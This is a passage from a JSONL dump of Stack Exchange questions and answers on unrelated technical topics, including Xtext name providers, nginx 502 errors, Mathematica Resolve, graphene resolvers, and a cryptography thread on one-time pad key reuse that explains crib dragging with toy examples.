doesn't work? What about those on mobile phones (non-smartphones), again with very limited or no Javascript functionality? What about those people who have simply disabled JS? Event these days, you simply can't assume that everyone can use JS.\nI like the original idea, but perhaps this would be better done via a simple server-side wrapper, which calls out to your data source but which can be quickly and easily changed to point at a different one.\nComment: I think javascript will be used more - didn't google announce a focus on html 5 and javascript?\n","meta":{"source":"stackoverflow","title":"Thinking of new way of building a db page populating data via api calls - are there any issues doing it this way","dup_signals":{}},"subset":"stackexchange"} +{"text":"Cross-References issues in Xtext\n\nQuestion: I am using Xtext 2.10.0 and seem to have some issues with cross-references. Simplified, my grammar (with org.eclipse.xtext.common.Terminals) is the following:\n<code>Model:\n package=Package\n dtos+=DTO*;\n\nPackage:\n 'package' name=FQN;\n\nFQN:\n ID ('.' ID)*;\n\nDTO:\n 'dto' name=ID ('extends' extendedDTO=[DTO|FQN])? '{' '}';\n<\/code>\nIn order to provide a correct qualified name for the DTOs, I implemented an own DefaultDeclarativeQualifiedNameProvider, which assembles a qualified name based on the name of the package and the name of the DTO.\nNow I create a first DTO in a file \"base.dto\":\n<code>package base\n\ndto BaseDTO {}\n<\/code>\nIn a second file \"mydto.dto\" I create a second DTO:\n<code>package mydto\n\ndto MyDTO extends base.BaseDTO {}\n<\/code>\nThe part \"base.BaseDTO\" is even suggested by the autocompletion mechanism. However, Eclipse marks this part as an error and says \"Couldn't resolve reference to DTO 'base.BaseDTO'.\". What do I have to change in order to resolve this reference?\nComment: can you please share your nameprovider impl\nComment: I think this was the right hint. Originally, I used this: \"QualifiedName.create(packageName, dtoName)\". However, the package name consists of several elements. I splittet the package name into segments (at the dot) and put all segments into the QualifiedName. This works. Thank you very much!\nAnswer: Here i my NameProvider Impl\n<code>class MyDslNameProvider extends DefaultDeclarativeQualifiedNameProvider {\n\n def QualifiedName qualifiedName(DTO dto) {\n val model = EcoreUtil2.getContainerOfType(dto, Model)\n val packageName = converter.toQualifiedName(model.package.name)\n val result = packageName.append(dto.name)\n result\n }\n\n}\n<\/code>\nAnswer: The issue was, that my original NameProvider had the following method (where \"qualifiedPackageName\" is an extension method delivering the name of the package):\n<code>def qualifiedName(DTO dto) {\n val packageName = dto.qualifiedPackageName\n val dtoName = dto.name\n\n val qualifiedName = QualifiedName.create(packageName, dtoName)\n\n qualifiedName\n}\n<\/code>\nHowever, the package name is a fully qualified name and it seems that it is necessary to split it into the single segments:\n<code>static val PACKAGE_SEPARATOR = '\\\\.'\n\ndef qualifiedName(DTO dto) {\n val packageName = dto.qualifiedPackageName\n val packageNameSegments = packageName.split(PACKAGE_SEPARATOR)\n val dtoName = dto.name\n\n val segments = packageNameSegments + #[dtoName]\n val qualifiedName = QualifiedName.create(segments)\n\n qualifiedName\n}\n<\/code>\nWith the modified NameProvider, everything seems to work perfect.\n","meta":{"source":"stackoverflow","title":"Cross-References issues in Xtext","dup_signals":{}},"subset":"stackexchange"} +{"text":"Taking advantage of one-time pad key reuse?\n\nQuestion: Suppose Alice wants to send encryptions (under a one-time pad) of $m_1$ and $m_2$ to Bob over a public channel. Alice and Bob have a shared key $k$; however, both messages are the same length as the key $k$. Since Alice is extraordinary lazy (and doesn't know about stream ciphers), she decides to just reuse the key.\nAlice sends ciphertexts $c_1 = m_1 \\oplus k$ and $c_2 = m_2 \\oplus k$ to Bob through a public channel. Unfortunately, Eve intercepts both of these ciphertexts and calculates $c_1 \\oplus c_2 = m_1 \\oplus m_2$.\n\nWhat can Eve do with $m_1 \\oplus m_2$? \n\nIntuitively, it makes sense that Alice and Bob would not want $m_1 \\oplus m_2$ to fall into Eve's hands, but how exactly should Eve continue with her attack?\nComment: Note that this question will also cover key stream reuse as generated by most stream ciphers such as RC4 or a block cipher in a mode of operation that generates a key stream such as AES-CTR. (OK, that should take care of the search engines :P )\nComment: Well, what you are doing is using a randomly generated key and combining it with the plaintext to form the ciphertext. If it is used more than once, then you could find out how the key and plaintext are being used to form the ciphertext, then exploit this to deduce some letters? Further, use common cryptanalysis techniques to solve (letter frequency, bigrams, etc...)? This might help: http:\/\/www.cs.utsa.edu\/~wagner\/laws\/pad.html\nAnswer: There is a great graphical representation (which I found on cryptosmith, but they keep changing their url structures, so I've added the graphics in here) of the possible problems that arise from reusing a one-time pad. \nLet's say you have the image\n\nand you encrypt it by using the binary one-time-pad (xor-ing on black and white)\n.\nYou get the following extremely secure encryption\n.\nIf you then encrypt a smiley face with the same one-time-pad,\n\nyou get another secure encryption\n.\nBut if you have both and you xor them together\n\nthen you get the image\n\nwhich, as you can qualitatively and intuitively see is very insecure.\nReusing the same key multiple times is called giving the encryption 'depth' - and it is intuitive that the more depth given, the more likely it is that information about the plaintext is contained within the encrypted text.\nThe process of 'peeling away' layered texts has been studied, as ir01 mentions, and those methods improve with more layers.\nComment: This picture illustrates things beautifully. I guess the spirit of my question was \"how would you actually do the statistical analysis once you have $m_1 \\oplus m_2$\"; a respectable cryptographer would probably say something like \"that's trivial\".\nComment: I can do that final XOR in my head, by crossing my eyes so that one eye is looking at each encrypted message - treating them like a random dot stero pair. It's not quite enough for me to read the text or recognise the smiley face, but it's certainly enough to see that there is some high contrast figure.\nAnswer: Here, since the key is used more than one time, an attack called \"crib dragging\" can be used to attack the cipher-text.\nThe blog post Many Time Pad Attack - Crib Drag could give you a greater understanding on the implementation part:\n\nMany Time Pad Attack \u2013 Crib Drag\n\nThe one time pad (OTP) is a type of stream cipher that is a perfectly secure method of encryption. It's very simple to implement and is perfectly secure as long as the length of the key is greater than or equal to the length of the message. That's its major downfall. However, it also requires that the key never be used more than once. This tutorial shows what happens when you re-use a key to encrypt more than one message. I also show how to uncover the plain-text of two messages that have been encrypted with the same key, without even knowing the key. I use a method called crib dragging.\n\nLet's begin with a brief description of OTP and how it works. Let's take the following message and key:\n\n<code>message = \"Hello World\"\nkey = \"supersecret\"\n<\/code>\n\nIf we convert both the message and key to hex strings, we get the following:\n\n<code>message = \"48656c6c6f20576f726c64\"\nkey = \"7375706572736563726574\"\n<\/code>\n\nIf we do a simple XOR of the two hex strings we get the following cipher-text:\n\n<code>cipher-text = \"3b101c091d53320c000910\"\n<\/code>\n\nIf we XOR the cipher-text with the key, we can recover the plain-text. That's how OTP works. Without the key, you have no way of uncovering the plain-text.\n\nLet's consider what happens when you have two messages encrypted with the same key. Take the following two messages and key:\n\n<code>message1 = \"Hello World\"\nmessage2 = \"the program\"\nkey = \"supersecret\"\n<\/code>\n\nIf we convert each message and the key to hex strings, and then encrypt each message using a simple XOR with the key, we'll get the following cipher-texts:\n\n<code>cipher-text1: \"3b101c091d53320c000910\"\ncipher-text2: \"071d154502010a04000419\"\n<\/code>\n\nLet's say that all we have is the two cipher-texts and the knowledge that they were encrypted with a supposed OTP; however, they were both encrypted with the same key. To attack this encryption and uncover the plain-text, follow the steps below.\n\nGuess a word that might appear in one of the messages\nEncode the word from step 1 to a hex string\nXOR the two cipher-text messages\nXOR the hex string from step 2 at each position of the XOR of the two cipher-texts (from step 3)\nWhen the result from step 4 is readable text, we guess the English word and expand our crib search.\nIf the result is not readable text, we try an XOR of the crib word at the next position.\n\nStep 1 seems difficult (guessing a word that might appear in one of the messages), but when you think about it, the word \"the\" is the most commonly used English word. So, we'll start with assuming \"the\" is in one of the messages. After encoding \"the\" as a hex string, we'll get \"746865\". That takes care of steps 1 and 2. If we XOR the two cipher-texts, we'll get the following result:\n\n<code>cipher-text1 XOR cipher-text2 = \"3c0d094c1f523808000d09\"\n<\/code>\n\nThe next step is to XOR our crib word \"746865\" at each position of the XOR of the cipher-texts. What we'll do is slide \"746865\" along each position of \"3c0d094c1f523808000d09\" and analyze the result. After the first XOR, we get the following result:\n\n<code> 3c0d094c1f523808000d09\nXOR 746865\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\n 48656c\n<\/code>\n\nWhen we convert the hex string \"48656c\" to ASCII, we get the following text, \"Hel\". This takes us to step 5 from above. Because this looks like readable text, we can assume that the word \"the\" is in the first position of one message. If we didn't get readable text, we would slide 48656c one position to the right and try again (and keep repeating until the end of 3c0d094c1f523808000d09).\n\nNote that we don't know which message contains the word \"the\". It could be in either <code>message1<\/code> or <code>message2<\/code>. Next, we need to guess what the word \"Hel\" is when fully expanded. It could be \"Help\", \"Hello\", etc. If we guess \"Hello\", we can convert \"Hello\" to a hex string, we get \"48656c6c6f\". We then XOR it with the XOR of the two cipher-texts (just like we did with \"the\"). Here's the result:\n\n<code> 3c0d094c1f523808000d09\nXOR 48656c6c6f\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\n 7468652070\n<\/code>\n\n\"7468652070\", when converted to ASCII, is \"the p\". We then repeat the process, guessing what \"the p\" might be when expanded and then XOR that result with the XOR of the cipher-texts. Granted, guessing what \"the p\" might expand to is not super easy, but you get the idea. If we were to guess \"the program\", convert it to a hex string, and XOR it with the XOR of the cipher-texts, we'll get \"Hello World\".\n\nThis is called crib dragging. My suggestion is to first try \" the \" (note the spaces before and after). Most cipher-texts that you'll try cracking will contain that word somewhere in the text. If the result of your crib drag yields gibberish, then you can be sure \" the \" isn't in either of the plain-text messages. So, try another commonly used English word or phrase and keep trying until the result yields something that looks like readable text. Then you can just expand your guess and keep XORing until you uncover the plain-text messages.\nAnswer: There are two methods, named statistical analysis or Frequency analysis and pattern matching.\nNote that in statistical analysis Eve should compute frequencies for $aLetter \\oplus aLetter$ using some tool like this. A real historical example using frequency analysis is the VENONA project. \nEDIT: Having statistical analysis of $aLetter \\oplus aLetter$ like this says:\nIf a character has distribution $X$, the two characters behind $c_1 \\oplus c_2$ with probability $P$ are $c_1$, $c_2$. \nComment: http:\/\/robert-lerner.com\/live-letter-frequency-analysis.php died\nComment: Since Robert Lerner's tool is not to be found, here is another: https:\/\/www.dcode.fr\/frequency-analysis\nAnswer: A recent (2006) paper that describes a method is \"A natural language approach to automated cryptanalysis of two-time pads\". The abstract:\n\nWhile keystream reuse in stream ciphers and one-time pads has been a\n well known problem for several decades, the risk to real systems has\n been underappreciated. Previous techniques have relied on being able\n to accurately guess words and phrases that appear in one of the\n plaintext messages, making it far easier to claim that \"an attacker\n would never be able to do that.\" In this paper, we show how an adversary\n can automatically recover messages encrypted under the same\n keystream if only the type of each message is known (e.g. an HTML page\n in English). Our method, which is related to HMMs, recovers the most\n probable plaintext of this type by using a statistical language model\n and a dynamic programming algorithm. It produces up to 99% accuracy on\n realistic data and can process ciphertexts at 200ms per byte on a\n $2,000 PC. To further demonstrate the practical effectiveness of the\n method, we show that our tool can recover documents encrypted by\n Microsoft Word 2002\nAnswer: Each zero in $m_1\\oplus m_2$ indicates a matching character. These are known as coincidences. The number of coincidences can possibly indicate what language they are communicating in since different languages have a different character frequency distribution. (Random data should have coincidences 1\/26 of the time if using only lowercase letters, whereas English should be around 6%). \nSee Index of Coincidence for more information about that.\nOther than that, you could XOR common words in various locations against $m_1\\oplus m_2$. If the result makes sense (i.e., isn't a bunch of gibberish unprintable ASCII characters) then you found a possible match for both original plain texts at that location. With enough persistence its very possible you could extract meaningful information. You might start with a word like 'the' and go from there, and maybe score the results using an English trigram distribution.\nComment: Actually it's 1\/52 since we have both lower and upper case, and even higher if you consider punctuation and other symbols. It wouldn't make much sense to start with 'the' because it's unlikely the word will align in both messages. On the other hand checking for it is not expensive so you might as well go for it. Looking for 'e' alone is much more likely to yield fruitful results, and then you proceed to find digrams, trigrams etc.\nComment: I specified 'if using only lowercase letters' in the post.\n\nIt's irrelevant if 'the' (actually ' the ' with spaces on each end is a better phrase to start with) matches up in both plain texts, just that it exists in one of the plain texts. If in m1 you have ' the ', then XORing ' the ' in the same position in m1\u2295m2 will reveal the corresponding text in m2.\n\nYou can't do this with individual characters because you have to be able to judge whether the result is random letters like 'xztyb' (thus not a match at that location) or maybe some letters like 'nd th' which would show up relatively often.\nAnswer: The thing here is:\nWhen you just XOR the cyphertexts with each other, what you get is in fact the XOR result of both cleartexts.\n\n$f(a) \\oplus f(b) = a \\oplus b$\n\nAnd after that point, all that's left is to use statistical analysis, as ir01 has mentioned.\nIn fact, the early cell phones used to implement a somewhat similar encryption scheme. They had a one byte (if my memory serves me well) key which was used to XOR the voice in blocks. Thus, an attacker could just XOR the voice message by itself phase shifted by one byte, and get the clear voice communication phase shifted and XOR'd by itself. Which is indeed very easy to crack. Even easier to crack than the XOR result of two separate cleartexts.\nAlso, as Tangurena mentioned, the Soviet message traffic was decrypted due to the fact that one-time-pads had been re-used. See the Wikipedia article on the VENONA Project.\nPlus, here's an article with a little more insight to the practical side of the subject:\nAutomated Cryptanalysis of Plaintext XORs of Waveform Encoded Speech\nAnswer: If you have $m_1 \\oplus m_2$, you can learn about the underlying message format. \nIt is possible to determine patterns in the underlying plaintext and use these patterns to extract data from the ciphertext.\nComment: For example, every zero in the output indicates a matching byte in the two inputs.\n","meta":{"source":"crypto.stackexchange","title":"Taking advantage of one-time pad key reuse?","dup_signals":{}},"subset":"stackexchange"} +{"text":"use an external Json as source with tagit.js\n\nQuestion: I have some problem with the tagit.js script (https:\/\/github.com\/aehlke\/tag-it)\ni know this kind of questions has been asked before : \nModify the behavior of jquery tag-it based on autocomplete library to use ajax JSON sources\nOR \njQuery TagIt (autocomplete) Fetching JSON list via AJAX\nIn my case, i can load tags from an external json, but there is no intelligent autocompletion. When i type \"Hello\", the plug in show me the whole tag which are on my Json, with no logical order.\nMy code : \n<code> $(function(){\n\n $('#biginput').tagit({\n\n allowSpaces:true,\n\n autocomplete: {delay: 0, minLength: 0},\n afterTagAdded: function(event, ui) {\n launchsearch();\n console.log(ui.tag);\n },\n afterTagRemoved: function(event, ui) {\n launchsearch();\n console.log(ui.tag);\n },\n\n tagSource: function(search, showChoices) {\n var that = this;\n $.ajax({\n url: \"search.json\",\n data: search,\n success: function(choices) {\n showChoices(that._subtractArray(choices, that.assignedTags()));\n }\n });\n }\n\n });\n\n});\n<\/code>\nI have tried to reproduce my problem in jsfiddle, but it doesn't work... \nLook here : http:\/\/jsfiddle.net\/bsofcn41\/\nMy goal is just to have tag autocompletion with a json file as basis.\nit seems that this script is very badly updated and maintained in github. Maybe there is better script of this kind ?\nAnswer: Try jquery-tokeninput. It uses json as autocomplete data.\n","meta":{"source":"stackoverflow","title":"use an external Json as source with tagit.js","dup_signals":{}},"subset":"stackexchange"} +{"text":"Given a string, return a string\n\nQuestion: So basically I want to return the string, with a message.\nThis is what I have so far, why am I getting undefined for the name back I have a series of test that run, and it's supposed to return a empty strong for the first test.\n<code>export const twoFer = (name) => {\n\n let saying = \"One for\" + name + \",\" + \"One for me\"\n let greeting = saying\n\n if (name === '') {\n let greeting = \"One for you, One for me\"\n } else {\n let greeting = \"One for\" + name + \",One for me\"\n }\n\n return greeting;\n};\n<\/code>\nI thought it would be useful to provide the tests as well so..\n<code>import { twoFer } from '.\/two-fer'\n\ndescribe('twoFer()', () => {\n test('no name given', () => {\n expect(twoFer()).toEqual(\"One for you, one for me.\")\n })\n\n xtest('a name given', () => {\n expect(twoFer(\"Alice\")).toEqual(\"One for Alice, one for me.\")\n })\n\n xtest('another name given', () => {\n expect(twoFer(\"Bob\")).toEqual(\"One for Bob, one for me.\")\n })\n})\n<\/code>\nEDIT Final Solution:\n<code>export const twoFer = (name = null) => {\n if (!name) {\n return \"One for you, one for me.\"\n } else {\n return \"One for \" + name + \",\" + \" one for me.\"\n }\n};\n<\/code>\nComment: I think you should make the string case insensitive.\nAnswer: In your example, <code>name<\/code> is not an empty string, it is <code>undefined<\/code>. Instead, try <code>!name<\/code>, which will be truthy for <code>undefined<\/code>, empty string, <code>null<\/code>, etc.\n\n<code>const twoFer = (name=null) => {\n if (!name) {\n return \"One for you, One for me\"\n } else {\n return \"One for \" + name + \", One for me\"\n }\n};\n\nconsole.log(twoFer());\nconsole.log(twoFer(''));\nconsole.log(twoFer('bob'));<\/code>\nComment: I am still receiving back undefined from the test .\nAnswer: Scope issue, consider these two cases:\n\n<code>const twoFer = (name) => {\n\n let saying = \"saying is now greeting \" + name\n let greeting = saying\n\n if (!name) {\n let greeting = \"this wont set greeting, because let is in if()'s scope\"\n } else {\n let greeting = \"this also wont set greeting\"\n }\n\n return greeting;\n};\nconsole.log(twoFer('foo'))<\/code>\n\nremoving <code>let<\/code>\n\n<code>const twoFer = (name) => {\n\n let saying = \"saying is now greeting \" + name\n let greeting = saying\n\n if (name === '') {\n greeting = \"One for you, One for me\"\n } else {\n greeting = \"One for\" + name + \",One for me\"\n }\n\n return greeting;\n};\nconsole.log(twoFer('foo'))<\/code>\n\nIs alot of unnecessary code it can be done with one line:\n<code>const twoFer = name => `One for ${name || 'you'}, One for me`\n<\/code>\n","meta":{"source":"stackoverflow","title":"Given a string, return a string","dup_signals":{}},"subset":"stackexchange"} +{"text":"502 error nginx + ruby on rails application\n\nQuestion: Application details :\nRails 3.1.0\nRuby 1.9.2\nunicorn 4.2.0\nresque 1.20.0\nnginx\/1.0.14\nredis 2.4.8 \nI am using active_admin gem, for all URL's getting response 200,\nbut only one URL giving 502 error on production.\nrake routes :\n<code>admin_links GET \/admin\/links(.:format) {:action=>\"index\", :controller=>\"admin\/links\"}\n<\/code>\nAnd its working on local(development).\nlocalhost log : response code 200\n<code> Started GET \"\/admin\/links\" for 127.0.0.1 at 2013-02-12 11:05:21 +0530\n Processing by Admin::LinksController#index as *\/*\n Parameters: {\"link\"=>{}}\n Geokit is using the domain: localhost\n AdminUser Load (0.2ms) SELECT `admin_users`.* FROM `admin_users` WHERE `admin_users`.`id` = 3 LIMIT 1\n (0.1ms) SELECT 1 FROM `links` LIMIT 1 OFFSET 0\n (0.1ms) SELECT COUNT(*) FROM `links` \n (0.2ms) SELECT COUNT(count_column) FROM (SELECT 1 AS count_column FROM `links` LIMIT 10 OFFSET 0) subquery_for_count \n CACHE (0.0ms) SELECT COUNT(count_column) FROM (SELECT 1 AS count_column FROM `links` LIMIT 10 OFFSET 0) subquery_for_count \n Link Load (0.6ms) SELECT `links`.* FROM `links` ORDER BY `links`.`id` desc LIMIT 10 OFFSET 0\n Link Load (6677.2ms) SELECT `links`.* FROM `links` \n Rendered \/usr\/local\/rvm\/gems\/ruby-1.9.2-head\/gems\/activeadmin-0.4.2\/app\/views\/active_admin\/resource\/index.html.arb (14919.0ms)\n Completed 200 OK in 15663ms (Views: 8835.0ms | ActiveRecord: 6682.8ms | Solr: 0.0ms)\n<\/code>\nproduction log : 502 response \n<code> Started GET \"\/admin\/links\" for 220.127.116.11 at 2013-02-12 05:25:37 +0000\n Processing by Admin::LinksController#index as *\/*\n Parameters: {\"link\"=>{}}\n<\/code>\nNGinx error log\n<code>2013\/02\/12 07:36:16 [error] 32401#0: *1948 upstream prematurely closed connection while reading response header from upstream\n<\/code>\ndon't know what's happening, could some buddy help me out.\nComment: Could you post your `rake routes` and the exact error you are seeing?\nComment: added *log* and `rake routes`\nComment: Unicorn and Nginx config please\nComment: In this case, upstream error means that your Unicorn processes are not running properly. Can you paste your unicorn config? Also can you observe the output of top command to see if there is any memory spikes with the application?\nComment: Did you find a solution to this problem?\nComment: @rkp Please help.....\nComment: @rkp: Can you please try solution for this problem http:\/\/stackoverflow.com\/questions\/27797234\/display-has-to-many-association-activeadmin-rails-not-working-in-staging-but-wor\nAnswer: You have a timeout problem.\nTackling it\n\nHTTP\/1.1 502 Bad Gateway\n\nIndicates, that nginx had a problem to talk to its configured upstream.\nhttp:\/\/en.wikipedia.org\/wiki\/List_of_HTTP_status_codes#502\n\n2013\/02\/12 07:36:16 [error] 32401#0: *1948 upstream prematurely closed connection while reading response header from upstream\n\nNginx error log tells you Nginx was actually able to connect to the configured upstream but the process closed the connection before the answer was (fully) received.\nYour development environment:\n\nCompleted 200 OK in 15663ms\n\nApparently you need around 15 seconds to generate the response on your development machine.\n\nIn contrast to proxy_connect_timeout, this timeout will catch a server\n that puts you in it's connection pool but does not respond to you with\n anything beyond that. Be careful though not to set this too low, as\n your proxy server might take a longer time to respond to requests on\n purpose (e.g. when serving you a report page that takes some time to\n compute). You are able though to have a different setting per\n location, which enables you to have a higher proxy_read_timeout for\n the report page's location.\n\nhttp:\/\/wiki.nginx.org\/HttpProxyModule#proxy_read_timeout\nOn the nginx side the proxy_read_timeout is at a default of 60 seconds, so that's safe\nI have no idea how ruby (on rails) works, check the error log - the timeout happens in that part of your stack\nComment: can you please try solution to this problem http:\/\/stackoverflow.com\/questions\/27797234\/display-has-to-many-association-activeadmin-rails-not-working-in-staging-but-wor\n","meta":{"source":"stackoverflow","title":"502 error nginx + ruby on rails application","dup_signals":{}},"subset":"stackexchange"} +{"text":"Buggy Reduce\/Resolve function?\n\nQuestion: It seems to me that this is a clear-cut case of Mathematica actually producing the wrong answer (with no warnings). \nI'm trying to express the fact that for any integer, there exists a factorization (even if that factorization is just n = n * 1). But Mathematica says no. \nIf I replace the domain with Reals or Complexes, then it says True. \nIs this a bug or am I using these functions incorrectly?\n<code>Resolve[ForAll[n, Exists[{p, q}, p*q == n]], Integers]\n\n(*Out[1]= False*)\n\nReduce[ForAll[n, Exists[{p, q}, p*q == n]], {n, p, q}, Integers]\n\n(*Out[2]= False*)\n<\/code>\nComment: `FullSimplify[ForAll[n, Exists[{p, q}, p*q == n]], {n, p, q} \\[Element] Integers]` works nicely, though.\nComment: @J.M. Try `FullSimplify[\n ForAll[n, Exists[{p, q}, p\/Pi q\/Sqrt@2 == n]], {n, p, q} \\[Element] \n Integers]`\nComment: @bel, now that sure is nasty...\nComment: @J.M. I believe the quantifiers are isolating its variables, so they are not visible to FullSimply's assumptions\nComment: It doesn't seem a problem of `FullSimplify`, but rather of `Exists\/ForAll`. E.g. `Resolve[ForAll[n, Exists[{p, q}, p*q == n]], {n, p, q} \\[Element] Integers]` returns `True`.\nComment: @belisarius, `Resolve[ForAll[n, n \\[Element] Reals], Primes]` returning `False` doesn't look too different, right?\nComment: @Rojo `Primes` does not work. Try `Resolve[ForAll[n, n \\[Element] Reals], #] & \/@ {Rationals, Integers, Reals, Complexes}` instead\nComment: The same thing happens when I move the Integers constraint to the condition part of the quantifiers, and change the Resolve domain to Reals, as in\n\n`Resolve[ForAll[n, n \\[Element] Integers, \n Exists[p, p \\[Element] Integers, \n Exists[q, q \\[Element] Integers, p*q == n]]], Reals]`\nAnswer: I think it is a limitation of <code>Resolve[]<\/code>.\nAs stated in the help:\n\nResolve[expr] can in principle always eliminate quantifiers if expr contains only polynomial equations and inequalities over the reals or complexes. \n\nIt shouldn't return <code>False<\/code>, though.\nEdit\nI am sure this\n<code>Trace[Resolve[ForAll[n, Exists[{p, q}, p q == n]], Integers], TraceInternal -> True]\n<\/code>\nmust explain what is happening ... but I wrote the relevant notes in the margin of some notebook and I can't find them now :)\n","meta":{"source":"mathematica.stackexchange","title":"Buggy Reduce\/Resolve function?","dup_signals":{}},"subset":"stackexchange"} +{"text":"MSI installer, Wix and dialog size value\n\nQuestion: I've noticed that the articles, tutorials and samples of creating the custom dialogs in Wix always use the same dialog size - Width=\"370\" Height=\"270\"(in the installer units) which corresponds to 494px * 360px for 96DPI. The example is http:\/\/blogs.technet.com\/b\/alexshev\/archive\/2008\/10\/16\/from-msi-to-wix-part-20-user-interface-required-dialog-boxes.aspx\nMoreover, a lot of MSI installers use exactly this size for the dialogs. I wonder where this size value came from? Is there any guideline about the installer dialog size?\nAnswer: These standard values for MSI UI dialogs come from Windows SDK, the <code>uisample.msi<\/code> file.\nThis size is close to the standard wizard Wizard interface, and MSI \"Wizards\" mimic Wizard\u00a0'97 UI. See Wizard '97 sample image, the size of the image is 513 \u00d7 397 px.\nAnswer: If there's anything special about it, it likely hails from a size that looked good on a default Windows 95 or so taskbar configuration with a screen resolution of 640x480 pixels. Realistically you can use other sizes, such as Visual Studio's installation which is much larger.\nComment: I don't think that what you said makes much sense. Visual Studio installer does not use the windows installer UI(see http:\/\/stackoverflow.com\/questions\/3233642\/how-do-you-make-a-really-nice-installer-like-visual-studios), so it can use arbitrary size. But my question IS about windows installer UI.\nComment: Also, I would like to notice that Wix has the built-in dialogs set(http:\/\/wix.sourceforge.net\/manual-wix3\/WixUI_customizations.htm) and they use the mentioned size value as well and it is not customizable.\nComment: I've never customized a WiX UI, so sorry if customizing its size is hard. I thought your question was more about size than the underlying technology, hence the comment about Visual Studio's larger UI - it is indeed an external UI, but it is an installer.\n","meta":{"source":"stackoverflow","title":"MSI installer, Wix and dialog size value","dup_signals":{}},"subset":"stackexchange"} +{"text":"Accessing the data of the parent graphene.ObjectType from the nested class\n\nQuestion: As mentioned\nin this question, a nested query in graphene in python can be done. Is there a way to access the data of a parent query?\nWith reference to the same question\n<code>query {\n person (id: \"Mary\") {\n id\n name\n }\n}\n<\/code>\nThe nested query:\n<code>query {\n people {\n group\n allPersons {\n name\n }\n }\n}\n<\/code>\nHow would I access <code>group<\/code> from <code>people<\/code> in the resolver for <code>allPersons<\/code>.\nAnswer: The graphene documentation doesn't make this clear.\nAs the page mentioned in the question the root query is as follows:\n<code>class YourQuery(object):\n # person = ...\n people = graphene.Field(AllPeopleType)\n\n def resolve_people(self, info):\n return AllPeopleType()\n<\/code>\nTo access the variables of the parent of <code>Person<\/code> which triggered <code>resolve_all_persons<\/code>, i.e <code>AllPersons<\/code>\n<code>class AllPeopleType(graphene.ObjectType):\n group = graphene.Int()\n all_persons = graphene.List(Person)\n\n def resolve_all_persons(self, info, **kwargs):\n # This allows us to access group of AllPersons\n personGroup = self['group']\n return Person.objects.all()\n<\/code>\nHowever this will not work if <code>all_persons<\/code> resolver is defined as\n<code>all_persons = graphene.List(Person, resolver = yourResolverFunctionHere)\n<\/code>\nThis is becuase the resolver for <code>Person<\/code> (and anything within <code>AllPersons<\/code>) must be a member of the Parent class <code>AllPersons<\/code> which resolves its own variables.\n","meta":{"source":"stackoverflow","title":"Accessing the data of the parent graphene.ObjectType from the nested class","dup_signals":{}},"subset":"stackexchange"} +{"text":"Editing a php scrip\u00e8t divs to output a table\n\nQuestion: Hey guys ok so i'm wokring on a clients Weekly Newsletter i'm working with Joomla 2.5.19 and using the enterprise version of acymailling to send it out. I'm kicking my heading in at the moment because of outlook, i'm using a module from Jreviews that publishes the latest reviews submitted to the site in the newsletter, it all works fine except in outlook. \nthe out put of the script is meant to be a 2x2table with the 4 latest reviews in it. the only prob is outlook seems to hates me using Div for a table and stacks the 2x2 table into a verticle kaotic mess.\nthe code i'm trying to edit is:\n'>\n<code><?php \/* root element for the items *\/ ?>\n<div class=\"jrModuleItems <?php echo $orientation . ' jrThumbnail'.ucfirst($tn_position); ?>\">\n\n <?php \/* new page starts here *\/\n $pages = array_chunk($reviews,$limit);\n $j=0;\n foreach($pages AS $page):\n ?>\n\n <div class=\"jr-results jrResults jrModuleContainer jrReviewsModule\">\n\n <?php $i=0;\n while(!empty($page)):\n $i++; $j++; $review = array_shift($page); ?>\n\n <?php\n \/\/ Process link title\n $listing_title = ($listing_title_chars && mb_strlen($review['Listing']['title'])>$listing_title_chars) ? $Text->truncate($review['Listing']['title'],$listing_title_chars) : $review['Listing']['title'];\n $review_title = ($review_title_chars && mb_strlen($review['Review']['title'])>$review_title_chars) ? $Text->truncate($review['Review']['title'],$review_title_chars) : $review['Review']['title'];\n $link_title = str_replace('{listing_title}',$listing_title,$link_title_format);\n $link_title = str_replace('{review_title}',$review_title,$link_title);\n\n \/\/ Create the thumbnail\n $tn_show and $mainMediaThumb = $Media->thumb(Sanitize::getVar($review,'MainMedia'),array('listing'=>$review,'size'=>$tn_size,'mode'=>$tn_mode,'css_size'=>true));\n ?>\n\n <?php $lastItem = ($i == $columns) ? ' jrLastItem' : ''; ?>\n\n <div class=\"jrModuleItem<?php echo $lastItem; ?>\" style=\"width: <?php echo $item_width; ?>%; padding-right: <?php echo $item_padding; ?>%;\">\n\n <?php if($show_numbers):?><div class=\"jrModuleItemNumber\"><?php echo $j;?>.<\/div><?php endif;?>\n\n <?php if($tn_show && $mainMediaThumb && $tn_position != 'bottom'):?>\n\n <!-- Listing Thumbnail -->\n <div class=\"jrModuleItemThumbnail\">\n <?php echo $Html->sefLink($mainMediaThumb,$review['Listing']['url']);?>\n <?php \/\/ Uncomment line below to show reviewer avatar. You can comment or remove the thumbnail code above\n \/\/ echo $Community->avatar($review);\n ?>\n <\/div>\n\n <?php endif;?>\n\n <div class=\"jrModuleItemContent\">\n\n <!-- Listing Title -->\n <div class=\"jrModuleItemTitle\">\n\n <?php echo $Html->sefLink($link_title,$review['Listing']['url']);?>\n\n <?php if(Sanitize::getString($review['Listing'],'tag')):?>\n\n <span class=\"jrComponentLabel jrStatusLabel jrBlue\">\n\n <?php echo Sanitize::getString($review['Listing'],'tag');?>\n\n <\/span>\n\n <?php endif;?>\n\n <\/div>\n\n <!-- Rating -->\n <?php if ( $review['Criteria']['state'] == 1 ):?>\n <div class=\"jrOverallRatings\">\n <?php if($review['Review']['editor'] == 1):?>\n <?php\n $rating_stars = $Rating->drawStars($review['Rating']['average_rating'], $this->Config->rating_scale, 'editor');\n $rating_value = $Rating->round($review['Rating']['average_rating'],$this->Config->rating_scale);\n ?>\n <div class=\"jrOverallEditor\" title=\"<?php __t(\"Editor rating\"); ?>\">\n <div class=\"jrRatingStars\"><?php echo $rating_stars ?><\/div>\n <span class=\"jrRatingValue\"><?php echo $rating_value?><\/span>\n <\/div>\n <?php else:?>\n <?php\n $rating_stars = $Rating->drawStars($review['Rating']['average_rating'], 